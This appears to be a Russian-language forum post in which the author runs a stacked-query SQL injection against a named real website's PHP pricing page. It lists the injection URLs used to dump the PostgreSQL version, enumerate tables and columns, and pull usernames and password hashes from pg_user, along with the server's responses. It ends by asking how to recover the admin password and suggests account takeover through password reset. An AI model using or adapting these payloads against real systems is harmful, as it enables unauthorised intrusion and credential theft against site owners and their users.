http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

выводит много интересного, но я выбрал pg_user

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

результат:

usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


первый это админ
login: postgres
pass: ********

Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....